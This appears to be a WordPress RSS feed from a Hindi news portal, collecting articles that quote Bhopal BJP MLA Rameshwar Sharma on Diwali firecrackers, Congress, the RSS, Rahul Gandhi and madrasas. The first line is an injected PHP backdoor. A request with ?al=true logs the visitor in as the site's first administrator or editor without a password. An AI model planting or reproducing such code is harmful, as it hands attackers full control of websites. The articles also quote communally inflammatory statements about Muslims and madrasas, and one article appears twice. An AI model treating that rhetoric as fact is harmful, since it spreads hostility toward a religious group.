// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Rameshwar Sharma – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Tue, 14 Oct 2025 11:08:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 रामेश्वर शर्मा ने दी चेतावनी: ‘पटाखे और दीए भी जलेंगे — हिंदुओं पर तंज बंद करें’ https://pratyushaashakinayikiran.com/?p=185514 Tue, 14 Oct 2025 11:08:00 +0000 https://pratyushaashakinayikiran.com/?p=185514 भोपाल
 मध्य प्रदेश में दीपावली से पहले पटाखें चलाने और दीए जलाने को लेकर एक नई बहस छिड़ गई है। जहां बढ़ते प्रदूषण को लेकर मुस्लिम समाज ने पटाखों की बिक्री और पटाखे चलाने को लेकर बयान दिया है, वहीं दूसरी ओर बागेश्वर धाम सरकार धीरेंद्र शास्त्री ने भी दो टूक कह दिया है कि- हम तो पटाखे फोड़ेंगे.. कृपया इस पर हमें ज्ञान ना पेलें। इसी क्रम में भाजपा विधायक रामेश्वर शर्मा का बयान सामने आया है। उन्होंने भी बाबा बागेश्वर के बयान पर सहमति जताई है और कहा है कि दीए भी जलेंगे और पटाखें भी फूटेंगे।

रामेश्वर शर्मा ने कहा कि हिंदू धर्म के त्योहार आते हैं तो कोई होली पर पानी की बचाने की बात और दिवाली पर प्रदूषण की बात होने लगती है। लेकिन पेड़ भी तो हिंदू वादी संगठन ही लगाते हैं। रामेश्वर शर्मा ने कहा कि जब 31 दिसंबर की रात को पटाखें चलते हैं तब कोई नहीं बोलता और अब तो मुस्लिम समाज के शादी समारोह में भी पटाखें और आतिशबाजी चलती है। लेकिन तब कोई नहीं बोलता, लेकिन जब होली, दशहरा दीपावली आते हैं तो सनातन और हिंदू धर्म पर चोट करने के लिए तब कहा जाता है कि पटाखें न चलाओं। लेकिन हम तो पटाखें चलाएंगे। दीए भी जलाएंगे। क्योंकि कानून सबके लिए समान है और व्यवहार भी सबके लिए समान है। इसलिए तंज कसना बंद करें, क्योंकि जब हिंदू तुमपे क्या कसेगा और जब हिंदू कसना शुरु करेगा तो ध्यान रखना कोई बचाने वाला भी नहीं आएगा।

]]>
कांग्रेस का सृजन हो या नेताओं का विसर्जन यह तो वही जानें हमको उससे क्या लेना देना :रामेश्वर शर्मा https://pratyushaashakinayikiran.com/?p=162768 Tue, 10 Jun 2025 12:26:00 +0000 https://pratyushaashakinayikiran.com/?p=162768 भोपाल

मध्य प्रदेश में कांग्रेस का संगठन सृजन अभियान चल रहा है, कांग्रेस ने नेता जिला स्तर पर जाकर जमीनी कार्यकर्ताओं से मुलाकात कर रहे हैं और संगठन को मजबूत करने के लिए राहुल गांधी द्वारा बनाये गए नए फार्मूले की जानकारी दे रहे हैं, इस अभियान में पार्टी अंदरूनी स्तर पर भी आमूलचूल परिवर्तन करने वाली है लेकिन भाजपा ने इसे लेकर तंज कसा है।

भाजपा विधायक रामेश्वर शर्मा ने कांग्रेस के संगठन सृजन अभियान पर तंज कसते हुए कहा है कि कांग्रेस का सृजन हो रहा है या नेताओं का विसर्जन हो रहा है यह तो वही जानें हमको उससे क्या लेना देना ? उन्होंने कहा जैसी कांग्रेस चल रही है हम तो शुभकामनाएँ देंगे।

एक ही पेड़ है उसके नीचे बैठकर जो चाहे निर्णय ले लो

विधायक शर्मा ने कहा कि  बेचारे अच्छे खासे आराम कर रहे हैं, कितनी तेज धूप हो रही है ऐसी धूप में जाकर करेंगे क्या ? ढूंढेंगे किसको? आदमी बचा हो तो ढूढेंगे न, जब लोग ही नहीं बचे तो ढूंढेंगे क्या? एक ही पेड़ है उसके नीचे बैठकर जो चाहे निर्णय ले लो, आदमी हो तो आदमी ढूंढोगे, जब आदमी बचे ही नहीं तो ढूंढोगे क्या?
जो फूल छाप बन गए उनके बारे में कैसे निर्णय लेंगे?

पिछले दिनों राहुल गांधी द्वारा भोपाल में पार्टी के नेताओं को फूल छाप कांग्रेसी बताने के बयान का जिक्र करते हुए रामेश्वर शर्मा ने कहा कि जो बचे हैं उनको आपने शंका के दायरे में डाल दिया, उनको सबको फूल छाप बना दिया और जो फूल छाप बन गए उनके बारे में कैसे निर्णय लेंगे?
हर कांग्रेसी एक दूसरे पर शंका कर रहा है

भाजपा विधायक ने कहा कि अब तो ऐसी स्थिति है कि जो कांग्रेस का टिकट लेता है वह भी फूल छाप निकल जाता है, जो कांग्रेस का अध्यक्ष बनता है वह भी फूल छाप निकल जाता है। अब कुल मिलाकर भाजपा का ऐसा फोबिया सवार हो गया है कि हर कांग्रेसी एक दूसरे पर शंका कर रहा है कि ऐसा तो नहीं कि यह भाजपा का आदमी हो, यह मोदी का आदमी हो?
मुंह से जय श्री राम निकला वह बस कांग्रेस की शंका के दायरे में आया

रामेश्वर शर्मा ने कहा कि आज जिसके भी मुंह से जय श्री राम निकला वह बस कांग्रेस की शंका के दायरे में आया, इसलिए उनका सृजन और विसर्जन दोनों एक साथ चल रहा है। गौरतलब है कि संगठन सृजन अभियान के जरिये कांग्रेस अपने संगठन को मजबूत कर रही है, जिला अध्यक्षों को अधिकार सम्पन्न बना रही है जिससे वो स्थानीय स्तर पर पार्टी को ताकतवर बनायें और ये सब केंद्रीय पर्यवेक्षकों की निगरानी में हो रहा है।

]]>
जीतू पटवारी के RSS पर दिए गए बयान को लेकर विधायक रामेश्वर शर्मा ने कड़ी प्रतिक्रिया दी https://pratyushaashakinayikiran.com/?p=147653 Thu, 10 Apr 2025 08:46:00 +0000 https://pratyushaashakinayikiran.com/?p=147653 भोपाल

 बीजेपी विधायक रामेश्वर शर्मा ने जीतू पटवारी के बयान पर तीखा पलटवार करते हुए कहा है कि आरएसएस को हराना ‘शेखचिल्ली का सपना’ है। उन्होंने कहा कि ‘आरएसएस को तो चाचा नेहरू और इंदिरा गांधी भी नहीं हरा पाए।’ बता दें कि कांग्रेस प्रदेश अध्यक्ष ने एक दिन पहले कहा था कि ‘आरएसएस और बीजेपी एक हैं। इनके विचार और व्यवहार भी एक हैं। इन्हें एक ही दृष्टि और दृष्टिकोण से देखने की जरूरत है! अब इनके मिलकर लड़ने की जरूरत है।’

रामेश्वर शर्मा ने कहा कि आरएसएस का कार्यकर्ता सत्ता के लिए नहीं, बल्कि हिंदुस्तान की संस्कृति के लिए लड़ता है। वह राम, कृष्ण, गौतम बुद्ध और गुरु नानक की संस्कृति को बचाने के लिए लड़ता है। उन्होंने कहा कि कांग्रेस आरएसएस से इसलिए नहीं लड़ सकती क्योंकि वह झूठी बिरयानी खाने में मस्त है, आतंकवाद का समर्थन करने में व्यस्त है और पाकिस्तान व जिन्ना की भाषा बोलने में डूबी हुई है।

‘RSS को हराना कांग्रेस का शेखचिल्ली का सपना’

रामेश्वर शर्मा ने कांग्रेस प्रदेश अध्यक्ष जीतू पटवारी के आरएसएस को हराने और उसके खिलाफ मिलकर लड़ने के बयान पर कड़ी प्रतिक्रिया जताते हुए कहा कि राष्ट्रीय स्वयंसेवक संघ को हराना असंभव है। उन्होंने कहा कि इसे हराने का सपना देखना “शेखचिल्ली के सपने” की तरह है। उन्होंने कांग्रेस पर जमकर निशाना साधा और कहा कि न तो जवाहरलाल नेहरू और न ही इंदिरा गांधी आरएसएस को हरा सके और आगे भी। शर्मा ने कहा कि “आरएसएस को आपके अब्बा चाचा नेहरू भी नहीं हरा पाए। चाचा नेहरू ने आरएसएस को हराने की कोशिश की, कई षड्यंत्र रचे, स्वयंसेवकों को जेल में डालने की साजिश की। इंदिरा गांधी ने आपातकाल लगाकर स्वयंसेवकों पर ज्यादती की, उनके साथ क्रूर व्यवहार किया गया, उन्हें मारा गया, सताया गया, उनकी संपत्ति को नुकसान पहुंचाया गया। लेकिन संघ का स्वयंसेवक देहनिष्ठ कार्यकर्ता है, उसका ध्येय है मैं रहूं न रहूं, मेरा हिंदुस्तान रहना चाहिए।”
कांग्रेस को आड़े हाथों लिया

उन्होंने कहा कि आरएसएस का कार्यकर्ता सत्ता के लिए नहीं, बल्कि हिंदुस्तान और उसकी संस्कृति के लिए लड़ता है। रामेश्वर शर्मा ने कांग्रेस पर आरोप लगाया कि कांग्रेस ने गांधी के विचारों को छोड़कर सत्ता को हथियाने का चरित्र अपनाया है। और सत्ता चाहे व्यक्तियों को मारकर सत्ता ली जाए या देश को जलाकर सत्ता हासिल की जाए..यही इनका इतिहास रहा है। लेकिन जब तक आरएसएस है, न हिंदुस्तान का विभाजन हो सकता है और न ही देशद्रोही ताकतें पनप सकती हैं। साथ उन्होंने कहा कि आरएसएस को कोई नहीं हरा सकता। संघ को हराना सिर्फ कांग्रेस का शेखचिल्ली का सपना है।

 

]]>
बेटा बेटी की शादी करते हो तुम जश्न मानते हो ना, भारत जीता है तो उसकी आतिशबाजी से नफरत क्यों: रामेश्वर शर्मा https://pratyushaashakinayikiran.com/?p=138504 Mon, 10 Mar 2025 11:40:00 +0000 https://pratyushaashakinayikiran.com/?p=138504 भोपाल
 मध्य प्रदेश के इंदौर के महू में टीम इंडिया की जीत को सेलिब्रेट कर रहे जुलूस पर पथराव की घटना की निंदा करते हुए बीजेपी विधायक रामेश्वर शर्मा ने बड़ा बयान दिया है। शर्मा ने कहा कि बेटा बेटी की शादी करते हो तुम जश्न मानते हो ना, भारत जीता है तो उसकी आतिशबाजी से नफरत क्यों ? अगर इनको पटाखों से नफरत है, तो इनको डॉक्टर मोहन यादव के पटाखे के डंडे खाने पड़ेंगे।
   
महू में हुई थी पथराव की घटना

बता दें कि इंदौर के महू में चैंपियंस ट्रॉफी में टीम इंडिया की जीत से उत्साहित लोगों ने जमकर जश्न मनाया। इस दौरान दो पक्षों के बीच विवाद हो गया। यहां टीम इंडिया की जीत को सेलिब्रेट कर रहे जुलूस पर जमकर पथराव किया गया। स्थानीय लोगों के मुताबिक, जीत का जश्न मनाने के लिए रैली निकाल रहे लोगों पर दूसरे पक्ष के लोगों ने पथराव कर दिया ,जिसमें कई लोग घायल हो गए। घटना से शहर के कई इलाकों में दहशत फैल गई है।  उपद्रव के दौरान आगजनी की घटनाएं भी हुईं जिनमें कुछ वाहनों को नुकसान हुआ है।

भारतीय टीम ने 12 साल बाद जीती चैंपियंस ट्रॉफी

मैच की बात करे तो, फाइनल में भारत ने न्यूजीलैंड को 4 विकेट से हराया। इसी के साथ रोहित शर्मा की कप्तानी वाली टीम इंडिया ने 12 साल बाद आईसीसी चैंपियंस ट्रॉफी के सूखे को खत्म करते हुए तीसरी बार वाइट ब्लेजर जीता। रोहित शर्मा को 76 रनों की पारी खेलने के लिए प्लेयर ऑफ द मैच चुना गया। उन्होंने अक्षर पटेल, श्रेयस अय्यर और केएल राहुल की अच्छी पारियों के साथ मिलकर टीम इंडिया को जीत दिलाई।

इंदौर कलेक्टर आशीष सिंह ने बताया कि स्थिति नियंत्रण में है और इलाके में सुरक्षा बल तैनात कर दिए गए हैं। उन्होंने बताया कि आईसीसी चैंपियंस ट्रॉफी के फाइनल में भारतीय टीम की जीत पर जश्न मनाने वाली रैली निकाली जा रही थी। रैली जब मस्जिद के पास पहुंची तो दो पक्षों में विवाद हो गया। विवाद इतना बढ़ा कि एक गुट ने दूसरे पर पथराव कर दिया। जिससे कई लोग घायल हो गए।

बीजेपी विधायक रामेश्वर शर्मा का महू की घटना पर बयान सामने आया है। उन्होंने कहा कि बेटा बेटी की शादी करते हो तुम जश्न मनाते हो ना भारत जीता है तो उसकी आतिशबाजी से नफरत क्यों ? अगर इनको पटाखों से नफरत है तो इनको डॉ मोहन यादव के पटाखे के डंडा खाने पड़ेंगे।

    भोपाल। मध्य प्रदेश के इंदौर के महू में टीम इंडिया की जीत को सेलिब्रेट कर रहे जुलूस पर पथराव की घटना की निंदा करते हुए बीजेपी विधायक रामेश्वर शर्मा ने बड़ा बयान दिया है। शर्मा ने कहा कि बेटा बेटी की शादी करते हो तुम जश्न मानते हो ना, भारत जीता है तो उसकी आतिशबाजी से नफरत क्यों ?… pic.twitter.com/QsZu1vM2nq

]]>
बेटा बेटी की शादी करते हो तुम जश्न मानते हो ना, भारत जीता है तो उसकी आतिशबाजी से नफरत क्यों: रामेश्वर शर्मा https://pratyushaashakinayikiran.com/?p=138506 Mon, 10 Mar 2025 11:40:00 +0000 https://pratyushaashakinayikiran.com/?p=138506 भोपाल
 मध्य प्रदेश के इंदौर के महू में टीम इंडिया की जीत को सेलिब्रेट कर रहे जुलूस पर पथराव की घटना की निंदा करते हुए बीजेपी विधायक रामेश्वर शर्मा ने बड़ा बयान दिया है। शर्मा ने कहा कि बेटा बेटी की शादी करते हो तुम जश्न मानते हो ना, भारत जीता है तो उसकी आतिशबाजी से नफरत क्यों ? अगर इनको पटाखों से नफरत है, तो इनको डॉक्टर मोहन यादव के पटाखे के डंडे खाने पड़ेंगे।
   
महू में हुई थी पथराव की घटना

बता दें कि इंदौर के महू में चैंपियंस ट्रॉफी में टीम इंडिया की जीत से उत्साहित लोगों ने जमकर जश्न मनाया। इस दौरान दो पक्षों के बीच विवाद हो गया। यहां टीम इंडिया की जीत को सेलिब्रेट कर रहे जुलूस पर जमकर पथराव किया गया। स्थानीय लोगों के मुताबिक, जीत का जश्न मनाने के लिए रैली निकाल रहे लोगों पर दूसरे पक्ष के लोगों ने पथराव कर दिया ,जिसमें कई लोग घायल हो गए। घटना से शहर के कई इलाकों में दहशत फैल गई है।  उपद्रव के दौरान आगजनी की घटनाएं भी हुईं जिनमें कुछ वाहनों को नुकसान हुआ है।

भारतीय टीम ने 12 साल बाद जीती चैंपियंस ट्रॉफी

मैच की बात करे तो, फाइनल में भारत ने न्यूजीलैंड को 4 विकेट से हराया। इसी के साथ रोहित शर्मा की कप्तानी वाली टीम इंडिया ने 12 साल बाद आईसीसी चैंपियंस ट्रॉफी के सूखे को खत्म करते हुए तीसरी बार वाइट ब्लेजर जीता। रोहित शर्मा को 76 रनों की पारी खेलने के लिए प्लेयर ऑफ द मैच चुना गया। उन्होंने अक्षर पटेल, श्रेयस अय्यर और केएल राहुल की अच्छी पारियों के साथ मिलकर टीम इंडिया को जीत दिलाई।

इंदौर कलेक्टर आशीष सिंह ने बताया कि स्थिति नियंत्रण में है और इलाके में सुरक्षा बल तैनात कर दिए गए हैं। उन्होंने बताया कि आईसीसी चैंपियंस ट्रॉफी के फाइनल में भारतीय टीम की जीत पर जश्न मनाने वाली रैली निकाली जा रही थी। रैली जब मस्जिद के पास पहुंची तो दो पक्षों में विवाद हो गया। विवाद इतना बढ़ा कि एक गुट ने दूसरे पर पथराव कर दिया। जिससे कई लोग घायल हो गए।

बीजेपी विधायक रामेश्वर शर्मा का महू की घटना पर बयान सामने आया है। उन्होंने कहा कि बेटा बेटी की शादी करते हो तुम जश्न मनाते हो ना भारत जीता है तो उसकी आतिशबाजी से नफरत क्यों ? अगर इनको पटाखों से नफरत है तो इनको डॉ मोहन यादव के पटाखे के डंडा खाने पड़ेंगे।

    भोपाल। मध्य प्रदेश के इंदौर के महू में टीम इंडिया की जीत को सेलिब्रेट कर रहे जुलूस पर पथराव की घटना की निंदा करते हुए बीजेपी विधायक रामेश्वर शर्मा ने बड़ा बयान दिया है। शर्मा ने कहा कि बेटा बेटी की शादी करते हो तुम जश्न मानते हो ना, भारत जीता है तो उसकी आतिशबाजी से नफरत क्यों ?… pic.twitter.com/QsZu1vM2nq

]]>
राहुल गांधी न असली हिंदू न असली गांधी, MLA रामेश्वर बोले- यह चुनावी हिंदू https://pratyushaashakinayikiran.com/?p=134239 Thu, 27 Feb 2025 11:36:00 +0000 https://pratyushaashakinayikiran.com/?p=134239 भोपाल
 कांग्रेस नेता राहुल गांधी के प्रयागराज महाकुंभ में नहीं जाने पर भोपाल के बीजेपी विधायक रामेश्वर शर्मा ने उनकी जाति को लेकर सियासी निशाना साधा है। उन्होंने कहा कि- राहुल गांधी असली हिंदू नहीं हैं, असली गांधी भी नहीं हैं। वे यहीं तक नहीं रूके उन्होंने सोनिया गांधी और प्रियंका वाड्रा गांधी को भी नकली गांधी परिवार बताया है। कहा यह असली हिंदू परिवार ही नहीं है, यह चुनावी हिंदू हैं, इसलिए सनातनियों, हिंदुस्तान के हिंदू इनसे सावधान रहना। जब वोट लेना होगा तो गंगा भी जाएंगे, मंदिर भी जाएंगे, कोट पर जनेऊ भी पहनेंगे। ये नकली हिन्दू राम मंदिर भी नहीं गए।

रामेश्वर शर्मा ने कहा कि- प्रयागराज पावन धरती है हिंदुस्तान का परम सौभाग्य है। यहां गंगा, जमुना मां सरस्वती का संगम का पावन तट है। युगों युगों से इसका लाभ भारतवर्ष के लोग लेते आए हैं। जो-जो सौभाग्यशाली थे वह सब गंगा के तट पर गए
और महाकुंभ में जाकर गंगा स्नान किया।

रामेश्वर शर्मा ने कहा कि, प्रयागराज पावन धरती है हिंदुस्तान का परम सौभाग्य है। यहां गंगा, जमुना मां सरस्वती का संगम का पावन तट है। युगों-युगों से इसका लाभ भारतवर्ष के लोग लेते आए हैं। जो-जो सौभाग्यशाली थे वह सब गंगा के तट पर गए और महाकुंभ में जाकर गंगा स्नान किया।

बता दें कि राहुल ने कहा था कि बीजेपी और RSS असली हिंदू नहीं हैं। वे लक्ष्मी और दुर्गा का अपमान करते हैं। इस पर पलटवार करते हुए शर्मा ने जारी बयान में कहा- राहुल गांधी जी, आप भी हिंदू नहीं हैं। आपके पूर्वज भी हिंदू नहीं थे। हमें खुद को हिंदू कहने में शर्मिंदगी का अहसास नहीं होता। जब नेहरू प्रधानमंत्री थे, तभी देश का विभाजन हुआ था। हजारों हिंदुओं की मौत हुई थी। आपको तो शुक्रगुजार होना चाहिए कि आरएसएस अस्तित्व में आया।

बीजेपी विधायक ने आगे कहा कि राहुल गांधी की मां (सोनिया गांधी) ईसाई हैं। उनके बहनोई भी ईसाई हैं। लगता नहीं है कि राहुल गांधी में हिंदू खून है। उन्होंने आरोप लगाया कि आरएसएस के कारण ही आप (कांग्रेस) देश नहीं बेच पाए। बीजेपी डंके की चोट पर हिंदुओं की बात और काम करती है। देश के प्रधानमंत्री नरेंद्र मोदी नहीं होते तो अयोध्या में राम मंदिर का निर्माण नहीं होता। कश्मीर में धारा 370 नहीं हटती। शर्मा ने यह भी आरोप लगाया कि आपके (राहुल गांधी) पुरखों ने मठ और मंदिर तुड़वाए। उनके शासनकाल में पाकिस्तान के नारे लगवाए गए।

कांग्रेस ने किया पलटवार

राहुल गांधी पर बीजेपी के आरोप पर कांग्रेस प्रवक्ता अभिनव बारोलिया का कहना है कि बीजेपी के कितने नेता महाकुंभ गए बीजेपी इसकी लिस्ट जारी करे। कितने मंत्री गए कितने विधायक गए। बेरोजगारी जैसे असल मुद्दों से भटकाने के लिए बीजेपी इस तरह की बयानबाजी कर रही है।

]]>
कांग्रेस का स्वदेशी भाव खत्म हो गया है महात्मा गांधी ने देश में रामराज जी की कल्पना की थी, कांग्रेस ने राम को ही नकार कर दिया : रामेश्वर शर्मा https://pratyushaashakinayikiran.com/?p=126448 Tue, 28 Jan 2025 18:26:00 +0000 https://pratyushaashakinayikiran.com/?p=126448 भोपाल
 कांग्रेस के राष्ट्रीय अध्यक्ष मल्लिकार्जुन खरगे के बयान पर बीजेपी ने सियासी हमला बोला है। विधायक रामेश्वर शर्मा ने कहा है कि- कांग्रेस विदेशी हुकूमत के हिसाब से चलती है। कांग्रेस का जन्मदाता भी विदेशी हुकूमत है और कांग्रेस का नेतृत्वकर कर्तव्य विदेशी है। कांग्रेस का स्वदेशी भाव खत्म हो गया है महात्मा गांधी ने देश में रामराज जी की कल्पना की थी। कांग्रेस ने राम को ही नकार कर दिया है। पाकिस्तान के टुकड़ों पर पलने वाली आज की कांग्रेस है। पिताजी ने आपका नाम मल्लिकार्जुन रखा। आपसे उम्मीद थी कि आप राम, गंगा, गौ माता को जानते होंगे गीता, गंगा, गौ माता भारत की आत्मा हैं। आपने भारत की आत्मा पर प्रहार किया है। कांग्रेसी बिरयानी खाने चले जाएंगे। रोजा इफ्तारी करने चले जाएंगे। आतंकवादियों की मौत पर आंसू बहाने चले जाएंगे लेकिन गंगा में डुबकी लगाने नहीं जाएंगे। गया में गंगा जी का ही घाट है। लोग जहां पिंडदान करते हैं जो डुबकी लगा रही हैं वह प्रार्थना कर रहे हैं कि कांग्रेस से पिंडदान छुड़ाओ। नाक रगड़कर माफी मांगे नहीं तो जनता गंगा घाट पर कांग्रेस का पिंडदान कर देगी।

तुम्हारे बाप पाकिस्तान में बैठे

कहा कि- सोनिया गांधी के इशारे पर रामकृष्ण गौतम महावीर का अपमान हो रहा है। कांग्रेस का पूरा कुनबा सनातन विरोधी है हम गंगा में डुबकी लगाएंगे मोक्ष भी मिलता है और गंगा में डुबकी लगाने से अरबों का व्यापार भी होता है। जहां जवाहरलाल नेहरू पैदा हुए वहां की भूमि पर जाकर आम लोगों से पूछो कि कितना व्यवसाय चल रहा है। फूल, अगरबत्ती, नारियल, टेंट वालों से पूछो कितना व्यवसाय होता है। गंगा राम गीता माता गौ माता का अपमान कर रही है। कांग्रेसी डुबकी वाले फोटो इसलिए नहीं खिंचवा सकते क्योंकि तुम्हारे बाप पाकिस्तान में बैठे हैं।

कांग्रेस का पलटवार

रामेश्वर शर्मा के बयान पर कांग्रेस ने पलटवार किया है। पूर्व विधायक शैलेंद्र पटेल ने कहा- रामेश्वर शर्मा मल्लिकार्जुन खरगे के बयान का अर्थ समझिए। बयान की गहराई में जाइए, धर्म की आड़ में पाप छुपाने का काम न करें। आपका काम है गरीबी दूर करना, गरीबी दूर हो नहीं रही, विकास हो नहीं रहा और अनर्गल बयानबाजी कर रहे हैं।

]]>
रामेश्वर शर्मा बोले -जब ‘मदरसों में मुस्लिम धर्म के आधार पर शिक्षा दी जा रही है तो वहां सनातन का बच्चा क्यों जाए? https://pratyushaashakinayikiran.com/?p=61409 Sat, 17 Aug 2024 17:10:00 +0000 https://pratyushaashakinayikiran.com/?p=61409 भोपाल

मध्य प्रदेश के मदरसों में गैर-मुस्लिम बच्चों को अनुमति के बिना धार्मिक शिक्षा दी तो मान्यता रद्द कर दी जाएगी. मदरसों में हिंदू बच्चों को पढ़ाने और फर्जी नामों से सरकारी मदद लेने के मामले में मोहन सरकार ने बड़ा फैसला लिया है. भोपाल की हुजूर सीट से बीजेपी विधायक रामेश्वर शर्मा ने इस फैसले का स्वागत किया है.

BJP MLA रामेश्वर शर्मा ने कहा, यह मध्य प्रदेश सरकार का स्वागत योग्य कदम है. इसके लिए मैं मुख्यमंत्री डॉ मोहन यादव जी को शुभकामनाएं देता हूं कि सरकार ने बहुत अच्छा निर्णय लिया है.

बीजेपी विधायक आगे बोले, मदरसों में क्या हो रहा है? इस्लामिक शिक्षा तो दी जा रही है. जब वहां मुस्लिम धर्म के आधार पर शिक्षा दी जा रही है तो वहां सनातन का बच्चा क्यों जाए? जैन का बच्चा क्यों जाए? सिख का बच्चा क्यों जाए? बौद्ध का बच्चा क्यों जाए और दूसरे धर्म के बच्चे वहां पढ़ने क्यों जाएं?

उन्होंने कहा कि इस फर्जी तरीके से जो मदरसे सरकारी अनुदान ले रहे हैं, सरकार इसकी जांच करें और उनके खिलाफ सख्त कार्रवाई हो. सरकारी भूमि पर यदि बिना अनुमति के कोई मदरसा बना है तो उन्हें तोड़ा जाए.

रामेश्वर शर्मा ने कहा, मदरसे से यदि एपीजे अब्दुल कलाम निकलें तो हमें आपत्ति नहीं है, लेकिन यदि जाकिर नाईक निकले तो समझ लीजिए कि वहां उन्मादी शिक्षा दी जा रही है. मदरसे से यदि कोई आतंकवादी निकलता है तो उन्मादी शिक्षा दी जा रही है. मदरसे केवल और केवल इस्लामीकरण और  तालिबानियों के हथियार बन गए हैं. मदरसे शिक्षा के केंद्र बिंदु नहीं है, न तो एमपी बोर्ड वहां पर काम करता है और न सीबीएसई बोर्ड काम करता है. मदरसे में दूसरे धर्म के अबोध बच्चों को ले जाकर उन्हें इस्लामी शिक्षा देते हैं, उनका धर्मांतरण का भी भविष्य का षड्यंत्र हो सकता है, इसलिए इस षड्यंत्र से बच्चों को बचाने के लिए यह मोहन यादव की सरकार का यह बहुत महत्वपूर्ण कदम है.

गैर मुस्लिमों को मदरसे में धार्मिक शिक्षा देने पर मान्यता होगी रद्द

बता दें कि मध्यप्रदेश में मदरसों को लेकर राज्य सरकार ने बड़ा फैसला लिया है. स्कूल शिक्षा विभाग ने आदेश जारी करते हुए मदरसों में पढ़ रहे छात्रों के भौतिक सत्यापन का आदेश जारी किया है. इस दौरान यदि वहां फ़र्ज़ी तरीके से गैर-मुस्लिम या मुस्लिम बच्चों के नाम पाए जाते हैं या बच्चों को उनके अभिभावकों की अनुमति के बिना धार्मिक शिक्षा दी जा रही होगी तो ऐसे मदरसों की मान्यता रद्द कर दी जाएगी.

 

]]>